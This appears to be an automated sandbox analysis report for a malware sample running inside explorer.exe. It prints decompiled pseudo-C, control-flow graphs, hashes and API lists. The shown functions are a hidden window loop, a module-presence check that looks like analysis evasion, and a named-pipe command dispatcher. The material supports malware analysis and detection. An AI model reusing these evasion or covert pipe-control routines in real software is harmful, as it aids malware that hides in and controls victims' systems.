                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
                            • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
                            • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00082EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 164 82eda-82f50 memset call 8902d 169 82fcd-82fd4 164->169 170 82f52-82f81 CreateWindowExA 164->170 171 82fdf-82ff4 169->171 173 82fd6-82fd7 169->173 170->171 172 82f83-82f92 ShowWindow 170->172 175 82f9b 172->175 173->171 176 82fba-82fcb 175->176 176->169 178 82f9d-82fa0 176->178 178->169 179 82fa2-82fb2 178->179 179->176
                            C-Code - Quality: 96%
                            			E00082EDA(void* __eflags) {
				CHAR* _v12;
				struct HINSTANCE__* _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				intOrPtr _t32;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x9e684; // 0xc2f8f0
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x9e688; // 0xb0000
				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v48 = 3;
				_v52 = 0x30;
				_v12 =  &_v144;
				_v44 = E00082E77;
				_push( &_v52);
				_t32 =  *0x9e694; // 0xc2fa48
				_v32 = _t64;
				if( *((intOrPtr*)(_t32 + 8))() == 0) {
					L6:
					_t34 =  *0x9e718; // 0x30094
					if(_t34 != 0) {
						_t39 =  *0x9e694; // 0xc2fa48
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x9e694; // 0xc2fa48
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x9e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				ShowWindow(_t44, 0);
				_t47 =  *0x9e694; // 0xc2fa48
				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
				while(1) {
					_t50 =  *0x9e694; // 0xc2fa48
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x9e694; // 0xc2fa48
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x9e694; // 0xc2fa48
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}























                            0x00082ee3
                            0x00082ef2
                            0x00082ef9
                            0x00082efe
                            0x00082f18
                            0x00082f20
                            0x00082f2d
                            0x00082f34
                            0x00082f3a
                            0x00082f41
                            0x00082f42
                            0x00082f47
                            0x00082f50
                            0x00082fcd
                            0x00082fcd
                            0x00082fd4
                            0x00082fd7
                            0x00082fdc
                            0x00082fdc
                            0x00082fdf
                            0x00082fe7
                            0x00082fec
                            0x00082ff4
                            0x00082ff4
                            0x00082f77
                            0x00082f7a
                            0x00082f81
                            0x00000000
                            0x00000000
                            0x00082f8a
                            0x00082f8d
                            0x00082f98
                            0x00082fba
                            0x00082fc1
                            0x00082fc6
                            0x00082fcb
                            0x00000000
                            0x00000000
                            0x00082fa0
                            0x00000000
                            0x00000000
                            0x00082fa6
                            0x00082fab
                            0x00082fb2
                            0x00082fb7
                            0x00082fb7
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 00082EF9
                            • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
                            • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateShowmemset
                            • String ID: 0
                            • API String ID: 3027179219-4108050209
                            • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
                            • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
                            • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00084D6D, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 181 84d6d-84d8f 182 84dee-84e1b call 8b7a8 call 8a86d call 8a471 181->182 183 84d91-84db3 call 895c7 * 2 181->183 196 84e1d-84e20 182->196 197 84e25-84e80 call 8e1bc call 895e1 call 892e5 call 885d5 call 8b269 182->197 183->182 193 84db5-84db7 183->193 193->182 195 84db9-84dc4 GetModuleHandleA 193->195 198 84dcd 195->198 199 84dc6-84dcb GetModuleHandleA 195->199 200 852b9-852bf 196->200 216 84ea1-84ed9 call 8861a call 84a0b 197->216 217 84e82-84e93 call 8896f 197->217 202 84dd5-84dec call 885c2 * 2 198->202 199->198 199->202 202->182 202->196 227 84ef8-84f1b 216->227 228 84edb-84ee3 216->228 223 84e9c-84e9f 217->223 224 84e95-84e97 call 8a2e3 217->224 223->216 224->223 230 84f1d-84f2b 227->230 231 84f2f-84f4d call 8e2c6 227->231 228->227 229 84ee5-84ee9 228->229 232 84eef-84ef2 229->232 233 851f3-85220 call 895e1 call 892e5 229->233 230->231 239 84f52-84f54 231->239 232->227 232->233 244 85222-8522b call 8b269 233->244 245 85247-852b4 call 885d5 lstrcpynW * 2 call 88fbe call 8861a * 2 233->245 241 84f71-84f78 239->241 242 84f56-84f6a call 8e2c6 239->242 241->233 243 84f7e-84f87 241->243 242->241 247 84f89-84f8e 243->247 248 84f96-84fa3 243->248 256 85239-85246 call 8861a 244->256 257 8522d-85232 244->257 278 852b7 245->278 247->248 253 84f90 247->253 248->233 254 84fa9-84fad 248->254 253->248 258 85082-85088 254->258 259 84fb3-84fb6 254->259 256->245 257->256 258->233 264 8508e-850ff call 849a5 call 8fc1f 258->264 259->233 262 84fbc-8500f call 849a5 call 88604 259->262 262->278 281 85015-8507d call 895e1 call 89640 call 885d5 call 8a911 call 8861a 262->281 264->233 282 85105-85119 call 88604 264->282 278->200 281->278 282->233 288 8511f-85171 call 8109a call 8902d call 860df 282->288 302 85173-851e2 call 89640 call 885d5 call 8a911 call 8861a 288->302 303 851e5-851f2 call 8861a 288->303 302->303 303->233
                            C-Code - Quality: 70%
                            			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0xc2fda0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0xc2fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0xc2fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0xc2fda0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0xc2f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1);
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0xc2f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0xc2f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}




















































































                            0x00084d6d
                            0x00084d73
                            0x00084d79
                            0x00084d7e
                            0x00084d8c
                            0x00084d8f
                            0x00084dee
                            0x00084df7
                            0x00084e00
                            0x00084e03
                            0x00084e0a
                            0x00084e0f
                            0x00084e14
                            0x00084e1b
                            0x00084e25
                            0x00084e2c
                            0x00084e32
                            0x00084e37
                            0x00084e3c
                            0x00084e43
                            0x00084e49
                            0x00084e4b
                            0x00084e4c
                            0x00084e50
                            0x00084e5b
                            0x00084e60
                            0x00084e69
                            0x00084e6e
                            0x00084e76
                            0x00084e7d
                            0x00084e7e
                            0x00084e80
                            0x00084e9c
                            0x00084e9f
                            0x00084e9f
                            0x00084ea8
                            0x00084ead
                            0x00084ebd
                            0x00084ec5
                            0x00084eca
                            0x00084ed0
                            0x00084ed3
                            0x00084ed9
                            0x00084ef8
                            0x00084efe
                            0x00084eff
                            0x00084f00
                            0x00084f01
                            0x00084f02
                            0x00084f03
                            0x00084f0d
                            0x00084f11
                            0x00084f16
                            0x00084f19
                            0x00084f1b
                            0x00084f2d
                            0x00084f2d
                            0x00084f2f
                            0x00084f3b
                            0x00084f40
                            0x00084f46
                            0x00084f4f
                            0x00084f52
                            0x00084f54
                            0x00084f5f
                            0x00084f64
                            0x00084f69
                            0x00084f6e
                            0x00084f6e
                            0x00084f71
                            0x00084f78
                            0x00000000
                            0x00084f7e
                            0x00084f7e
                            0x00084f83
                            0x00084f87
                            0x00084f89
                            0x00084f8c
                            0x00084f8e
                            0x00084f94
                            0x00084f94
                            0x00084f8e
                            0x00084f96
                            0x00084f9b
                            0x00084fa1
                            0x00084fa3
                            0x00000000
                            0x00084fa9
                            0x00084fa9
                            0x00084fad
                            0x00085082
                            0x00085088
                            0x0008508e
                            0x00085099
                            0x0008509a
                            0x0008509b
                            0x0008509c
                            0x000850a2
                            0x000850a7
                            0x000850ad
                            0x000850b5
                            0x000850bb
                            0x000850be
                            0x000850cd
                            0x000850d4
                            0x000850d7
                            0x000850e4
                            0x000850e8
                            0x000850f5
                            0x000850fa
                            0x000850fd
                            0x000850ff
                            0x00085110
                            0x00085112
                            0x00085116
                            0x00085117
                            0x00085119
                            0x00085124
                            0x00085129
                            0x00085136
                            0x0008513a
                            0x0008513b
                            0x0008513d
                            0x00085145
                            0x00085146
                            0x0008514b
                            0x00085163
                            0x00085168
                            0x0008516b
                            0x0008516f
                            0x00085171
                            0x00085184
                            0x0008518e
                            0x00085192
                            0x0008519a
                            0x0008519b
                            0x000851a3
                            0x000851a4
                            0x000851a9
                            0x000851b5
                            0x000851bf
                            0x000851d1
                            0x000851dd
                            0x000851e2
                            0x000851e2
                            0x000851ec
                            0x000851f2
                            0x000851f2
                            0x00085119
                            0x000850ff
                            0x00000000
                            0x00085088
                            0x00084fb3
                            0x00084fb6
                            0x00000000
                            0x00000000
                            0x00084fbc
                            0x00084fc7
                            0x00084fc8
                            0x00084fc9
                            0x00084fca
                            0x00084fd0
                            0x00084fd5
                            0x00084fe9
                            0x00084fee
                            0x00084ff2
                            0x00084ffd
                            0x00085006
                            0x00085008
                            0x0008500c
                            0x0008500d
                            0x0008500f
                            0x0008501a
                            0x00085020
                            0x00085032
                            0x00085035
                            0x00085038
                            0x00085045
                            0x0008504d
                            0x00085057
                            0x00085069
                            0x00085075
                            0x0008507a
                            0x00000000
                            0x0008500f
                            0x00084fa3
                            0x00084edb
                            0x00084edb
                            0x00084ee1
                            0x00084ee3
                            0x00000000
                            0x00000000
                            0x00084ee5
                            0x00084ee9
                            0x000851f3
                            0x000851f8
                            0x000851fe
                            0x00085200
                            0x00085201
                            0x00085205
                            0x00085215
                            0x0008521a
                            0x0008521e
                            0x00085220
                            0x00085224
                            0x00085229
                            0x0008522b
                            0x0008522d
                            0x00085233
                            0x00085233
                            0x00085240
                            0x00085246
                            0x0008524c
                            0x00085251
                            0x0008526f
                            0x00085271
                            0x0008527d
                            0x0008527d
                            0x00085283
                            0x00085285
                            0x0008528b
                            0x0008529d
                            0x000852a3
                            0x000852af
                            0x000852b7
                            0x000852b7
                            0x000852b7
                            0x000852b9
                            0x000852bf
                            0x000852bf
                            0x00084eef
                            0x00084ef2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00084ef2
                            0x00084ed9
                            0x00084e1d
                            0x00084e1d
                            0x00000000
                            0x00084e1d
                            0x00084d9b
                            0x00084da2
                            0x00084dab
                            0x00084dad
                            0x00084db3
                            0x00084dc4
                            0x00084dcd
                            0x00084dcd
                            0x00084dd9
                            0x00084de2
                            0x00084de7
                            0x00084dec
                            0x00000000
                            0x00000000
                            0x00084dec

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                            • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                            • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                            Memory Dump Source
                            • Source File: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
                            • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                            • Opcode Fuzzy Hash: ae3128c5bf61f7131e0d1b683ef89ae83d4c83addd2df4ad547d9d14deb7b66d
                            • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189pipeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 314 832a1-832b4 315 832b7-832ce ConnectNamedPipe 314->315 316 832d0-832db GetLastError 315->316 317 832e1-83304 315->317 316->317 318 834c2-834c8 316->318 320 834a8 GetLastError 317->320 321 8330a-8330e 317->321 322 834ae-834bc DisconnectNamedPipe 320->322 321->320 323 83314-83320 321->323 322->315 322->318 324 833b8-833d1 call 893be 323->324 325 83326-83329 323->325 334 83476-8349b call 896ca 324->334 335 833d7-833dd 324->335 327 8332b-8332f 325->327 328 83397-833b3 call 8c319 325->328 331 8337b-83384 call 8f79f 327->331 332 83331-83334 327->332 328->322 352 83358-8335b 331->352 337 83365-83369 call 8f79f 332->337 338 83336-83339 332->338 354 8349d-834a6 call 8c319 334->354 342 833df-833f6 call 88604 335->342 343 83454-8346f call 89749 call 81da0 335->343 350 8336e-83376 337->350 339 8333b-8333e 338->339 340 8334f-83353 call 8f7c1 338->340 339->322 346 83344-8334d call 8f7c1 339->346 340->352 362 833f8-833fd 342->362 363 83471 342->363 343->334 346->350 350->354 355 8335d-83363 352->355 356 83386-83388 352->356 354->322 361 8338a-83392 call 8c319 355->361 356->361 361->322 368 8342a-83452 call 89749 call 81da0 call 894b7 362->368 369 833ff-83402 362->369 366 83473 363->366 366->334 368->366 373 83404-83425 call 8c379 call 891a6 369->373 382 83427 373->382 382->368
                            C-Code - Quality: 54%
                            			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0xc2f8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x1920020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x1920020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}




































                            0x000832ac
                            0x000832ae
                            0x000832b0
                            0x000832b4
                            0x000832b7
                            0x000832c3
                            0x000832ce
                            0x00000000
                            0x00000000
                            0x000832e1
                            0x000832e5
                            0x000832e6
                            0x000832eb
                            0x000832f0
                            0x000832f6
                            0x00083304
                            0x000834a8
                            0x00083314
                            0x00083314
                            0x0008331d
                            0x00083320
                            0x000833c8
                            0x000833ca
                            0x000833d1
                            0x000833d7
                            0x000833dd
                            0x00083456
                            0x00083461
                            0x00083466
                            0x00083469
                            0x000833df
                            0x000833e2
                            0x000833ee
                            0x000833f0
                            0x000833f6
                            0x00083471
                            0x000833f8
                            0x000833fd
                            0x000833ff
                            0x00083402
                            0x00083404
                            0x00083412
                            0x00083417
                            0x0008341a
                            0x0008341b
                            0x00083420
                            0x00083423
                            0x00083427
                            0x00083427
                            0x0008342c
                            0x00083439
                            0x0008343e
                            0x00083441
                            0x0008344d
                            0x0008344d
                            0x00083473
                            0x00083473
                            0x000833dd
                            0x00083476
                            0x0008348a
                            0x0008348f
                            0x0008349a
                            0x0008349b
                            0x00000000
                            0x00083326
                            0x00083326
